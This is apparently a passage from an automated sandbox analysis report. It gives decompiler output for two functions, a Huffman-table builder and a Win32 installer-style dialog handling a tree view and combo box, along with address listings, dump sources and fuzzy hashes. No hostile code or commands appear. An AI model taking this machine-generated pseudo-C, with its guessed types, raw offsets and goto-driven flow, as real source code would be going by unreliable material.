                                                                                    			E0040711C(signed char _a4, char _a5, short _a6, signed int _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, signed int* _a24, signed int _a28, intOrPtr _a32, signed int* _a36) {
				signed int _v8;
				unsigned int _v12;
				signed int _v16;
				intOrPtr _v20;
				signed int _v24;
				signed int _v28;
				intOrPtr* _v32;
				signed int* _v36;
				signed int _v40;
				signed int _v44;
				intOrPtr _v48;
				intOrPtr _v52;
				void _v116;
				signed int _v176;
				signed int _v180;
				signed int _v240;
				signed int _t166;
				signed int _t168;
				intOrPtr _t175;
				signed int _t181;
				void* _t182;
				intOrPtr _t183;
				signed int* _t184;
				signed int _t186;
				signed int _t187;
				signed int* _t189;
				signed int _t190;
				intOrPtr* _t191;
				intOrPtr _t192;
				signed int _t193;
				signed int _t195;
				signed int _t200;
				signed int _t205;
				void* _t207;
				short _t208;
				signed char _t222;
				signed int _t224;
				signed int _t225;
				signed int* _t232;
				signed int _t233;
				signed int _t234;
				void* _t235;
				signed int _t236;
				signed int _t244;
				signed int _t246;
				signed int _t251;
				signed int _t254;
				signed int _t256;
				signed int _t259;
				signed int _t262;
				void* _t263;
				void* _t264;
				signed int _t267;
				intOrPtr _t269;
				intOrPtr _t271;
				signed int _t274;
				intOrPtr* _t275;
				unsigned int _t276;
				void* _t277;
				signed int _t278;
				intOrPtr* _t279;
				signed int _t281;
				intOrPtr _t282;
				intOrPtr _t283;
				signed int* _t284;
				signed int _t286;
				signed int _t287;
				signed int _t288;
				signed int _t296;
				signed int* _t297;
				intOrPtr _t298;
				void* _t299;

				_t278 = _a8;
				_t187 = 0x10;
				memset( &_v116, 0, _t187 << 2);
				_t189 = _a4;
				_t233 = _t278;
				do {
					_t166 =  *_t189;
					_t189 =  &(_t189[1]);
					 *((intOrPtr*)(_t299 + _t166 * 4 - 0x70)) =  *((intOrPtr*)(_t299 + _t166 * 4 - 0x70)) + 1;
					_t233 = _t233 - 1;
				} while (_t233 != 0);
				if(_v116 != _t278) {
					_t279 = _a28;
					_t267 =  *_t279;
					_t190 = 1;
					_a28 = _t267;
					_t234 = 0xf;
					while(1) {
						_t168 = 0;
						if( *((intOrPtr*)(_t299 + _t190 * 4 - 0x70)) != 0) {
							break;
						}
						_t190 = _t190 + 1;
						if(_t190 <= _t234) {
							continue;
						}
						break;
					}
					_v8 = _t190;
					if(_t267 < _t190) {
						_a28 = _t190;
					}
					while( *((intOrPtr*)(_t299 + _t234 * 4 - 0x70)) == _t168) {
						_t234 = _t234 - 1;
						if(_t234 != 0) {
							continue;
						}
						break;
					}
					_v28 = _t234;
					if(_a28 > _t234) {
						_a28 = _t234;
					}
					 *_t279 = _a28;
					_t181 = 1 << _t190;
					while(_t190 < _t234) {
						_t182 = _t181 -  *((intOrPtr*)(_t299 + _t190 * 4 - 0x70));
						if(_t182 < 0) {
							L64:
							return _t168 | 0xffffffff;
						}
						_t190 = _t190 + 1;
						_t181 = _t182 + _t182;
					}
					_t281 = _t234 << 2;
					_t191 = _t299 + _t281 - 0x70;
					_t269 =  *_t191;
					_t183 = _t181 - _t269;
					_v52 = _t183;
					if(_t183 < 0) {
						goto L64;
					}
					_v176 = _t168;
					 *_t191 = _t269 + _t183;
					_t192 = 0;
					_t235 = _t234 - 1;
					if(_t235 == 0) {
						L21:
						_t184 = _a4;
						_t271 = 0;
						do {
							_t193 =  *_t184;
							_t184 =  &(_t184[1]);
							if(_t193 != _t168) {
								_t232 = _t299 + _t193 * 4 - 0xb0;
								_t236 =  *_t232;
								 *((intOrPtr*)(0x42d6a8 + _t236 * 4)) = _t271;
								 *_t232 = _t236 + 1;
							}
							_t271 = _t271 + 1;
						} while (_t271 < _a8);
						_v16 = _v16 | 0xffffffff;
						_v40 = _v40 & 0x00000000;
						_a8 =  *((intOrPtr*)(_t299 + _t281 - 0xb0));
						_t195 = _v8;
						_t186 =  ~_a28;
						_v12 = _t168;
						_v180 = _t168;
						_v36 = 0x42d6a8;
						_v240 = _t168;
						if(_t195 > _v28) {
							L62:
							_t168 = 0;
							if(_v52 == 0 || _v28 == 1) {
								return _t168;
							} else {
								goto L64;
							}
						}
						_v44 = _t195 - 1;
						_v32 = _t299 + _t195 * 4 - 0x70;
						do {
							_t282 =  *_v32;
							if(_t282 == 0) {
								goto L61;
							}
							while(1) {
								_t283 = _t282 - 1;
								_t200 = _a28 + _t186;
								_v48 = _t283;
								_v24 = _t200;
								if(_v8 <= _t200) {
									goto L45;
								}
								L31:
								_v20 = _t283 + 1;
								do {
									_v16 = _v16 + 1;
									_t296 = _v28 - _v24;
									if(_t296 > _a28) {
										_t296 = _a28;
									}
									_t222 = _v8 - _v24;
									_t254 = 1 << _t222;
									if(1 <= _v20) {
										L40:
										_t256 =  *_a36;
										_t168 = 1 << _t222;
										_v40 = 1;
										_t274 = _t256 + 1;
										if(_t274 > 0x5a0) {
											goto L64;
										}
									} else {
										_t275 = _v32;
										_t263 = _t254 + (_t168 | 0xffffffff) - _v48;
										if(_t222 >= _t296) {
											goto L40;
										}
										while(1) {
											_t222 = _t222 + 1;
											if(_t222 >= _t296) {
												goto L40;
											}
											_t275 = _t275 + 4;
											_t264 = _t263 + _t263;
											_t175 =  *_t275;
											if(_t264 <= _t175) {
												goto L40;
											}
											_t263 = _t264 - _t175;
										}
										goto L40;
									}
									_t168 = _a32 + _t256 * 4;
									_t297 = _t299 + _v16 * 4 - 0xec;
									 *_a36 = _t274;
									_t259 = _v16;
									 *_t297 = _t168;
									if(_t259 == 0) {
										 *_a24 = _t168;
									} else {
										_t276 = _v12;
										_t298 =  *((intOrPtr*)(_t297 - 4));
										 *(_t299 + _t259 * 4 - 0xb0) = _t276;
										_a5 = _a28;
										_a4 = _t222;
										_t262 = _t276 >> _t186;
										_a6 = (_t168 - _t298 >> 2) - _t262;
										 *(_t298 + _t262 * 4) = _a4;
									}
									_t224 = _v24;
									_t186 = _t224;
									_t225 = _t224 + _a28;
									_v24 = _t225;
								} while (_v8 > _t225);
								L45:
								_t284 = _v36;
								_a5 = _v8 - _t186;
								if(_t284 < 0x42d6a8 + _a8 * 4) {
									_t205 =  *_t284;
									if(_t205 >= _a12) {
										_t207 = _t205 - _a12 + _t205 - _a12;
										_v36 =  &(_v36[1]);
										_a4 =  *((intOrPtr*)(_t207 + _a20)) + 0x50;
										_t208 =  *((intOrPtr*)(_t207 + _a16));
									} else {
										_a4 = (_t205 & 0xffffff00 | _t205 - 0x00000100 > 0x00000000) - 0x00000001 & 0x00000060;
										_t208 =  *_t284;
										_v36 =  &(_t284[1]);
									}
									_a6 = _t208;
								} else {
									_a4 = 0xc0;
								}
								_t286 = 1 << _v8 - _t186;
								_t244 = _v12 >> _t186;
								while(_t244 < _v40) {
									 *(_t168 + _t244 * 4) = _a4;
									_t244 = _t244 + _t286;
								}
								_t287 = _v12;
								_t246 = 1 << _v44;
								while((_t287 & _t246) != 0) {
									_t287 = _t287 ^ _t246;
									_t246 = _t246 >> 1;
								}
								_t288 = _t287 ^ _t246;
								_v20 = 1;
								_v12 = _t288;
								_t251 = _v16;
								if(((1 << _t186) - 0x00000001 & _t288) ==  *((intOrPtr*)(_t299 + _t251 * 4 - 0xb0))) {
									L60:
									if(_v48 != 0) {
										_t282 = _v48;
										_t283 = _t282 - 1;
										_t200 = _a28 + _t186;
										_v48 = _t283;
										_v24 = _t200;
										if(_v8 <= _t200) {
											goto L45;
										}
										goto L31;
									}
									break;
								} else {
									goto L58;
								}
								do {
									L58:
									_t186 = _t186 - _a28;
									_t251 = _t251 - 1;
								} while (((1 << _t186) - 0x00000001 & _v12) !=  *((intOrPtr*)(_t299 + _t251 * 4 - 0xb0)));
								_v16 = _t251;
								goto L60;
							}
							L61:
							_v8 = _v8 + 1;
							_v32 = _v32 + 4;
							_v44 = _v44 + 1;
						} while (_v8 <= _v28);
						goto L62;
					}
					_t277 = 0;
					do {
						_t192 = _t192 +  *((intOrPtr*)(_t299 + _t277 - 0x6c));
						_t277 = _t277 + 4;
						_t235 = _t235 - 1;
						 *((intOrPtr*)(_t299 + _t277 - 0xac)) = _t192;
					} while (_t235 != 0);
					goto L21;
				}
				 *_a24 =  *_a24 & 0x00000000;
				 *_a28 =  *_a28 & 0x00000000;
				return 0;
			}











































































                                                                                    0x00407127
                                                                                    0x0040712f
                                                                                    0x00407133
                                                                                    0x00407135
                                                                                    0x00407138
                                                                                    0x0040713a
                                                                                    0x0040713a
                                                                                    0x0040713c
                                                                                    0x00407143
                                                                                    0x00407145
                                                                                    0x00407145
                                                                                    0x0040714b
                                                                                    0x00407160
                                                                                    0x00407168
                                                                                    0x0040716a
                                                                                    0x0040716c
                                                                                    0x0040716f
                                                                                    0x00407170
                                                                                    0x00407170
                                                                                    0x00407176
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00407178
                                                                                    0x0040717b
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x0040717b
                                                                                    0x0040717f
                                                                                    0x00407182
                                                                                    0x00407184
                                                                                    0x00407184
                                                                                    0x00407187
                                                                                    0x0040718d
                                                                                    0x0040718e
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x0040718e
                                                                                    0x00407193
                                                                                    0x00407196
                                                                                    0x00407198
                                                                                    0x00407198
                                                                                    0x0040719e
                                                                                    0x004071a0
                                                                                    0x004071b1
                                                                                    0x004071a4
                                                                                    0x004071a8
                                                                                    0x0040744d
                                                                                    0x00000000
                                                                                    0x0040744d
                                                                                    0x004071ae
                                                                                    0x004071af
                                                                                    0x004071af
                                                                                    0x004071b7
                                                                                    0x004071ba
                                                                                    0x004071be
                                                                                    0x004071c0
                                                                                    0x004071c2
                                                                                    0x004071c5
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x004071cd
                                                                                    0x004071d3
                                                                                    0x004071d5
                                                                                    0x004071d7
                                                                                    0x004071d8
                                                                                    0x004071ed
                                                                                    0x004071ed
                                                                                    0x004071f0
                                                                                    0x004071f2
                                                                                    0x004071f2
                                                                                    0x004071f4
                                                                                    0x004071f9
                                                                                    0x004071fb
                                                                                    0x00407202
                                                                                    0x00407204
                                                                                    0x0040720c
                                                                                    0x0040720c
                                                                                    0x0040720e
                                                                                    0x0040720f
                                                                                    0x0040721e
                                                                                    0x00407222
                                                                                    0x00407226
                                                                                    0x00407229
                                                                                    0x0040722c
                                                                                    0x00407231
                                                                                    0x00407234
                                                                                    0x0040723a
                                                                                    0x00407241
                                                                                    0x00407247
                                                                                    0x00407440
                                                                                    0x00407440
                                                                                    0x00407445
                                                                                    0x00407454
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00407445
                                                                                    0x00407254
                                                                                    0x00407257
                                                                                    0x0040725a
                                                                                    0x0040725d
                                                                                    0x00407261
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x0040726c
                                                                                    0x0040726f
                                                                                    0x00407270
                                                                                    0x00407272
                                                                                    0x00407278
                                                                                    0x0040727b
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00407281
                                                                                    0x00407282
                                                                                    0x00407285
                                                                                    0x00407288
                                                                                    0x0040728b
                                                                                    0x00407291
                                                                                    0x00407293
                                                                                    0x00407293
                                                                                    0x0040729b
                                                                                    0x0040729f
                                                                                    0x004072a4
                                                                                    0x004072c9
                                                                                    0x004072cf
                                                                                    0x004072d1
                                                                                    0x004072d3
                                                                                    0x004072d6
                                                                                    0x004072df
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x004072a6
                                                                                    0x004072a6
                                                                                    0x004072af
                                                                                    0x004072b3
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x004072c4
                                                                                    0x004072c4
                                                                                    0x004072c7
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x004072b7
                                                                                    0x004072ba
                                                                                    0x004072bc
                                                                                    0x004072c0
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x004072c2
                                                                                    0x004072c2
                                                                                    0x00000000
                                                                                    0x004072c4
                                                                                    0x004072e8
                                                                                    0x004072ee
                                                                                    0x004072f8
                                                                                    0x004072fa
                                                                                    0x004072ff
                                                                                    0x00407301
                                                                                    0x00407337
                                                                                    0x00407303
                                                                                    0x00407303
                                                                                    0x00407306
                                                                                    0x00407309
                                                                                    0x00407313
                                                                                    0x00407316
                                                                                    0x0040731d
                                                                                    0x00407328
                                                                                    0x0040732f
                                                                                    0x0040732f
                                                                                    0x00407339
                                                                                    0x0040733c
                                                                                    0x0040733e
                                                                                    0x00407344
                                                                                    0x00407344
                                                                                    0x0040734d
                                                                                    0x00407350
                                                                                    0x00407355
                                                                                    0x00407364
                                                                                    0x0040736c
                                                                                    0x00407371
                                                                                    0x00407395
                                                                                    0x0040739d
                                                                                    0x004073a1
                                                                                    0x004073a7
                                                                                    0x00407373
                                                                                    0x00407381
                                                                                    0x00407384
                                                                                    0x0040738a
                                                                                    0x0040738a
                                                                                    0x004073ab
                                                                                    0x00407366
                                                                                    0x00407366
                                                                                    0x00407366
                                                                                    0x004073bc
                                                                                    0x004073c0
                                                                                    0x004073cc
                                                                                    0x004073c7
                                                                                    0x004073ca
                                                                                    0x004073ca
                                                                                    0x004073d4
                                                                                    0x004073d9
                                                                                    0x004073e1
                                                                                    0x004073dd
                                                                                    0x004073df
                                                                                    0x004073df
                                                                                    0x004073e7
                                                                                    0x004073e9
                                                                                    0x004073f0
                                                                                    0x004073fa
                                                                                    0x00407404
                                                                                    0x00407420
                                                                                    0x00407424
                                                                                    0x00407269
                                                                                    0x0040726f
                                                                                    0x00407270
                                                                                    0x00407272
                                                                                    0x00407278
                                                                                    0x0040727b
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x0040727b
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00407406
                                                                                    0x00407406
                                                                                    0x00407406
                                                                                    0x0040740b
                                                                                    0x00407414
                                                                                    0x0040741d
                                                                                    0x00000000
                                                                                    0x0040741d
                                                                                    0x0040742a
                                                                                    0x0040742a
                                                                                    0x0040742d
                                                                                    0x00407434
                                                                                    0x00407437
                                                                                    0x00000000
                                                                                    0x0040725a
                                                                                    0x004071da
                                                                                    0x004071dc
                                                                                    0x004071dc
                                                                                    0x004071e0
                                                                                    0x004071e3
                                                                                    0x004071e4
                                                                                    0x004071e4
                                                                                    0x00000000
                                                                                    0x004071dc
                                                                                    0x00407150
                                                                                    0x00407156
                                                                                    0x00000000

                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.656835129.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.656827724.0000000000400000.00000002.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.656846871.0000000000408000.00000002.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.656854254.000000000040A000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.656864509.0000000000415000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.656885480.000000000042C000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.656892970.0000000000435000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.656899144.0000000000438000.00000002.00020000.sdmp Download File
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 99f6c7e6b8620be82bccd3d2e3e98bb61de1be8b453b643f323292903d4af905
                                                                                    • Instruction ID: 8f207273dfcdbc59f762b6c847d1a58b94b1624b669f9e87ec0d9a9138a8e2bc
                                                                                    • Opcode Fuzzy Hash: 99f6c7e6b8620be82bccd3d2e3e98bb61de1be8b453b643f323292903d4af905
                                                                                    • Instruction Fuzzy Hash: 0DC15A31E04259CBCF18CF68D4905EEBBB2BF98314F25826AD8567B380D734A942CF95
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 00404B80, Relevance: 63.5, APIs: 33, Strings: 3, Instructions: 491windowmemoryCOMMON
                                                                                    Download Yara Rule
                                                                                    C-Code - Quality: 96%
                                                                                    			E00404B80(struct HWND__* _a4, int _a8, signed int _a12, int _a16) {
				struct HWND__* _v8;
				struct HWND__* _v12;
				long _v16;
				signed int _v20;
				signed int _v24;
				intOrPtr _v28;
				signed char* _v32;
				int _v36;
				signed int _v44;
				int _v48;
				signed int* _v60;
				signed char* _v64;
				signed int _v68;
				long _v72;
				void* _v76;
				intOrPtr _v80;
				intOrPtr _v84;
				void* _v88;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t203;
				intOrPtr _t206;
				intOrPtr _t207;
				long _t212;
				signed int _t216;
				signed int _t227;
				void* _t230;
				void* _t231;
				int _t237;
				long _t242;
				long _t243;
				signed int _t244;
				signed int _t250;
				signed int _t252;
				signed char _t253;
				signed char _t259;
				void* _t264;
				void* _t266;
				signed char* _t284;
				signed char _t285;
				long _t290;
				signed int _t300;
				signed int _t308;
				signed char* _t316;
				int _t320;
				int _t321;
				signed int* _t322;
				int _t323;
				long _t324;
				signed int _t325;
				long _t327;
				int _t328;
				signed int _t329;
				void* _t331;

				_v12 = GetDlgItem(_a4, 0x3f9);
				_v8 = GetDlgItem(_a4, 0x408);
				_t331 = SendMessageA;
				_v24 =  *0x42f468;
				_v28 =  *0x42f434 + 0x94;
				_t320 = 0x10;
				if(_a8 != 0x110) {
					L23:
					if(_a8 != 0x405) {
						_t298 = _a16;
					} else {
						_a12 = 0;
						_t298 = 1;
						_a8 = 0x40f;
						_a16 = 1;
					}
					if(_a8 == 0x4e || _a8 == 0x413) {
						_v16 = _t298;
						if(_a8 == 0x413 ||  *((intOrPtr*)(_t298 + 4)) == 0x408) {
							if(( *0x42f43d & 0x00000002) != 0) {
								L41:
								if(_v16 != 0) {
									_t242 = _v16;
									if( *((intOrPtr*)(_t242 + 8)) == 0xfffffe6e) {
										SendMessageA(_v8, 0x419, 0,  *(_t242 + 0x5c));
									}
									_t243 = _v16;
									if( *((intOrPtr*)(_t243 + 8)) == 0xfffffe6a) {
										_t298 = _v24;
										_t244 =  *(_t243 + 0x5c);
										if( *((intOrPtr*)(_t243 + 0xc)) != 2) {
											 *(_t244 * 0x418 + _t298 + 8) =  *(_t244 * 0x418 + _t298 + 8) & 0xffffffdf;
										} else {
											 *(_t244 * 0x418 + _t298 + 8) =  *(_t244 * 0x418 + _t298 + 8) | 0x00000020;
										}
									}
								}
								goto L48;
							}
							if(_a8 == 0x413) {
								L33:
								_t298 = 0 | _a8 != 0x00000413;
								_t250 = E00404ACE(_v8, _a8 != 0x413);
								_t325 = _t250;
								if(_t325 >= 0) {
									_t99 = _v24 + 8; // 0x8
									_t298 = _t250 * 0x418 + _t99;
									_t252 =  *_t298;
									if((_t252 & 0x00000010) == 0) {
										if((_t252 & 0x00000040) == 0) {
											_t253 = _t252 ^ 0x00000001;
										} else {
											_t259 = _t252 ^ 0x00000080;
											if(_t259 >= 0) {
												_t253 = _t259 & 0x000000fe;
											} else {
												_t253 = _t259 | 0x00000001;
											}
										}
										 *_t298 = _t253;
										E0040117D(_t325);
										_a12 = _t325 + 1;
										_a16 =  !( *0x42f43c) >> 0x00000008 & 0x00000001;
										_a8 = 0x40f;
									}
								}
								goto L41;
							}
							_t298 = _a16;
							if( *((intOrPtr*)(_a16 + 8)) != 0xfffffffe) {
								goto L41;
							}
							goto L33;
						} else {
							goto L48;
						}
					} else {
						L48:
						if(_a8 != 0x111) {
							L56:
							if(_a8 == 0x200) {
								SendMessageA(_v8, 0x200, 0, 0);
							}
							if(_a8 == 0x40b) {
								_t230 =  *0x42a874;
								if(_t230 != 0) {
									ImageList_Destroy(_t230);
								}
								_t231 =  *0x42a888;
								if(_t231 != 0) {
									GlobalFree(_t231);
								}
								 *0x42a874 = 0;
								 *0x42a888 = 0;
								 *0x42f4a0 = 0;
							}
							if(_a8 != 0x40f) {
								L90:
								if(_a8 == 0x420 && ( *0x42f43d & 0x00000001) != 0) {
									_t321 = (0 | _a16 == 0x00000020) << 3;
									ShowWindow(_v8, _t321);
									ShowWindow(GetDlgItem(_a4, 0x3fe), _t321);
								}
								goto L93;
							} else {
								E004011EF(_t298, 0, 0);
								_t203 = _a12;
								if(_t203 != 0) {
									if(_t203 != 0xffffffff) {
										_t203 = _t203 - 1;
									}
									_push(_t203);
									_push(8);
									E00404B4E();
								}
								if(_a16 == 0) {
									L75:
									E004011EF(_t298, 0, 0);
									_v36 =  *0x42a888;
									_t206 =  *0x42f468;
									_v64 = 0xf030;
									_v24 = 0;
									if( *0x42f46c <= 0) {
										L86:
										if( *0x42f42c == 4) {
											InvalidateRect(_v8, 0, 1);
										}
										_t207 =  *0x42ebfc; // 0x63d143
										if( *((intOrPtr*)(_t207 + 0x10)) != 0) {
											E00404A89(0x3ff, 0xfffffffb, E00404AA1(5));
										}
										goto L90;
									}
									_t322 = _t206 + 8;
									do {
										_t212 =  *((intOrPtr*)(_v36 + _v24 * 4));
										if(_t212 != 0) {
											_t300 =  *_t322;
											_v72 = _t212;
											_v76 = 8;
											if((_t300 & 0x00000001) != 0) {
												_v76 = 9;
												_v60 =  &(_t322[4]);
												_t322[0] = _t322[0] & 0x000000fe;
											}
											if((_t300 & 0x00000040) == 0) {
												_t216 = (_t300 & 0x00000001) + 1;
												if((_t300 & 0x00000010) != 0) {
													_t216 = _t216 + 3;
												}
											} else {
												_t216 = 3;
											}
											_v68 = (_t216 << 0x0000000b | _t300 & 0x00000008) + (_t216 << 0x0000000b | _t300 & 0x00000008) | _t300 & 0x00000020;
											SendMessageA(_v8, 0x1102, (_t300 >> 0x00000005 & 0x00000001) + 1, _v72);
											SendMessageA(_v8, 0x110d, 0,  &_v76);
										}
										_v24 = _v24 + 1;
										_t322 =  &(_t322[0x106]);
									} while (_v24 <  *0x42f46c);
									goto L86;
								} else {
									_t323 = E004012E2( *0x42a888);
									E00401299(_t323);
									_t227 = 0;
									_t298 = 0;
									if(_t323 <= 0) {
										L74:
										SendMessageA(_v12, 0x14e, _t298, 0);
										_a16 = _t323;
										_a8 = 0x420;
										goto L75;
									} else {
										goto L71;
									}
									do {
										L71:
										if( *((intOrPtr*)(_v28 + _t227 * 4)) != 0) {
											_t298 = _t298 + 1;
										}
										_t227 = _t227 + 1;
									} while (_t227 < _t323);
									goto L74;
								}
							}
						}
						if(_a12 != 0x3f9 || _a12 >> 0x10 != 1) {
							goto L93;
						} else {
							_t237 = SendMessageA(_v12, 0x147, 0, 0);
							if(_t237 == 0xffffffff) {
								goto L93;
							}
							_t324 = SendMessageA(_v12, 0x150, _t237, 0);
							if(_t324 == 0xffffffff ||  *((intOrPtr*)(_v28 + _t324 * 4)) == 0) {
								_t324 = 0x20;
							}
							E00401299(_t324);
							SendMessageA(_a4, 0x420, 0, _t324);
							_a12 = _a12 | 0xffffffff;
							_a16 = 0;
							_a8 = 0x40f;
							goto L56;
						}
					}
				} else {
					_v36 = 0;
					 *0x42f4a0 = _a4;
					_v20 = 2;
					 *0x42a888 = GlobalAlloc(0x40,  *0x42f46c << 2);
					_t264 = LoadImageA( *0x42f420, 0x6e, 0, 0, 0, 0);
					 *0x42a87c =  *0x42a87c | 0xffffffff;
					_v16 = _t264;
					 *0x42a884 = SetWindowLongA(_v8, 0xfffffffc, E00405192);
					_t266 = ImageList_Create(_t320, _t320, 0x21, 6, 0);
					 *0x42a874 = _t266;
					ImageList_AddMasked(_t266, _v16, 0xff00ff);
					SendMessageA(_v8, 0x1109, 2,  *0x42a874);
					if(SendMessageA(_v8, 0x111c, 0, 0) < _t320) {
						SendMessageA(_v8, 0x111b, _t320, 0);
					}
					DeleteObject(_v16);
					_t327 = 0;
					do {
						_t272 =  *((intOrPtr*)(_v28 + _t327 * 4));
						if( *((intOrPtr*)(_v28 + _t327 * 4)) != 0) {
							if(_t327 != 0x20) {
								_v20 = 0;
							}
							SendMessageA(_v12, 0x151, SendMessageA(_v12, 0x143, 0, E0040618A(0, _t327, _t331, 0, _t272)), _t327);
						}
						_t327 = _t327 + 1;
					} while (_t327 < 0x21);
					_t328 = _a16;
					_push( *((intOrPtr*)(_t328 + 0x30 + _v20 * 4)));
					_push(0x15);
					E0040417B(_a4);
					_push( *((intOrPtr*)(_t328 + 0x34 + _v20 * 4)));
					_push(0x16);
					E0040417B(_a4);
					_t329 = 0;
					_v16 = 0;
					if( *0x42f46c <= 0) {
						L19:
						SetWindowLongA(_v8, 0xfffffff0, GetWindowLongA(_v8, 0xfffffff0) & 0x000000fb);
						goto L20;
					} else {
						_t316 = _v24 + 8;
						_v32 = _t316;
						do {
							_t284 =  &(_t316[0x10]);
							if( *_t284 != 0) {
								_v64 = _t284;
								_t285 =  *_t316;
								_v88 = _v16;
								_t308 = 0x20;
								_v84 = 0xffff0002;
								_v80 = 0xd;
								_v68 = _t308;
								_v44 = _t329;
								_v72 = _t285 & _t308;
								if((_t285 & 0x00000002) == 0) {
									if((_t285 & 0x00000004) == 0) {
										 *( *0x42a888 + _t329 * 4) = SendMessageA(_v8, 0x1100, 0,  &_v88);
									} else {
										_v16 = SendMessageA(_v8, 0x110a, 3, _v16);
									}
								} else {
									_v80 = 0x4d;
									_v48 = 1;
									_t290 = SendMessageA(_v8, 0x1100, 0,  &_v88);
									_v36 = 1;
									 *( *0x42a888 + _t329 * 4) = _t290;
									_v16 =  *( *0x42a888 + _t329 * 4);
								}
							}
							_t329 = _t329 + 1;
							_t316 =  &(_v32[0x418]);
							_v32 = _t316;
						} while (_t329 <  *0x42f46c);
						if(_v36 != 0) {
							L20:
							if(_v20 != 0) {
								E004041B0(_v8);
								goto L23;
							} else {
								ShowWindow(_v12, 5);
								E004041B0(_v12);
								L93:
								return E004041E2(_a8, _a12, _a16);
							}
						}
						goto L19;
					}
				}
			}


























































                                                                                    0x00404b9e
                                                                                    0x00404ba6
                                                                                    0x00404bae
                                                                                    0x00404bb4
                                                                                    0x00404bcc
                                                                                    0x00404bcf
                                                                                    0x00404bd0
                                                                                    0x00404dfd
                                                                                    0x00404e04
                                                                                    0x00404e18
                                                                                    0x00404e06
                                                                                    0x00404e08
                                                                                    0x00404e0b
                                                                                    0x00404e0c
                                                                                    0x00404e13
                                                                                    0x00404e13
                                                                                    0x00404e24
                                                                                    0x00404e32
                                                                                    0x00404e35
                                                                                    0x00404e4b
                                                                                    0x00404ec0
                                                                                    0x00404ec3
                                                                                    0x00404ec5
                                                                                    0x00404ecf
                                                                                    0x00404edd
                                                                                    0x00404edd
                                                                                    0x00404edf
                                                                                    0x00404ee9
                                                                                    0x00404eef
                                                                                    0x00404ef2
                                                                                    0x00404ef5
                                                                                    0x00404f10
                                                                                    0x00404ef7
                                                                                    0x00404f01
                                                                                    0x00404f01
                                                                                    0x00404ef5
                                                                                    0x00404ee9
                                                                                    0x00000000
                                                                                    0x00404ec3
                                                                                    0x00404e50
                                                                                    0x00404e5b
                                                                                    0x00404e60
                                                                                    0x00404e67
                                                                                    0x00404e6c
                                                                                    0x00404e70
                                                                                    0x00404e7b
                                                                                    0x00404e7b
                                                                                    0x00404e7f
                                                                                    0x00404e83
                                                                                    0x00404e87
                                                                                    0x00404e9a
                                                                                    0x00404e89
                                                                                    0x00404e89
                                                                                    0x00404e90
                                                                                    0x00404e96
                                                                                    0x00404e92
                                                                                    0x00404e92
                                                                                    0x00404e92
                                                                                    0x00404e90
                                                                                    0x00404e9e
                                                                                    0x00404ea0
                                                                                    0x00404eb3
                                                                                    0x00404eb6
                                                                                    0x00404eb9
                                                                                    0x00404eb9
                                                                                    0x00404e83
                                                                                    0x00000000
                                                                                    0x00404e70
                                                                                    0x00404e52
                                                                                    0x00404e59
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00404f13
                                                                                    0x00404f13
                                                                                    0x00404f1a
                                                                                    0x00404f8b
                                                                                    0x00404f93
                                                                                    0x00404f9b
                                                                                    0x00404f9b
                                                                                    0x00404fa4
                                                                                    0x00404fa6
                                                                                    0x00404fad
                                                                                    0x00404fb0
                                                                                    0x00404fb0
                                                                                    0x00404fb6
                                                                                    0x00404fbd
                                                                                    0x00404fc0
                                                                                    0x00404fc0
                                                                                    0x00404fc6
                                                                                    0x00404fcc
                                                                                    0x00404fd2
                                                                                    0x00404fd2
                                                                                    0x00404fdf
                                                                                    0x0040513f
                                                                                    0x00405146
                                                                                    0x00405163
                                                                                    0x00405169
                                                                                    0x0040517b
                                                                                    0x0040517b
                                                                                    0x00000000
                                                                                    0x00404fe5
                                                                                    0x00404fe7
                                                                                    0x00404fec
                                                                                    0x00404ff1
                                                                                    0x00404ff6
                                                                                    0x00404ff8
                                                                                    0x00404ff8
                                                                                    0x00404ff9
                                                                                    0x00404ffa
                                                                                    0x00404ffc
                                                                                    0x00404ffc
                                                                                    0x00405004
                                                                                    0x00405045
                                                                                    0x00405047
                                                                                    0x00405057
                                                                                    0x0040505a
                                                                                    0x0040505f
                                                                                    0x00405066
                                                                                    0x00405069
                                                                                    0x0040510b
                                                                                    0x00405113
                                                                                    0x0040511b
                                                                                    0x0040511b
                                                                                    0x00405121
                                                                                    0x00405129
                                                                                    0x0040513a
                                                                                    0x0040513a
                                                                                    0x00000000
                                                                                    0x00405129
                                                                                    0x0040506f
                                                                                    0x00405072
                                                                                    0x00405078
                                                                                    0x0040507d
                                                                                    0x0040507f
                                                                                    0x00405081
                                                                                    0x00405087
                                                                                    0x0040508e
                                                                                    0x00405093
                                                                                    0x0040509a
                                                                                    0x0040509d
                                                                                    0x0040509d
                                                                                    0x004050a4
                                                                                    0x004050b0
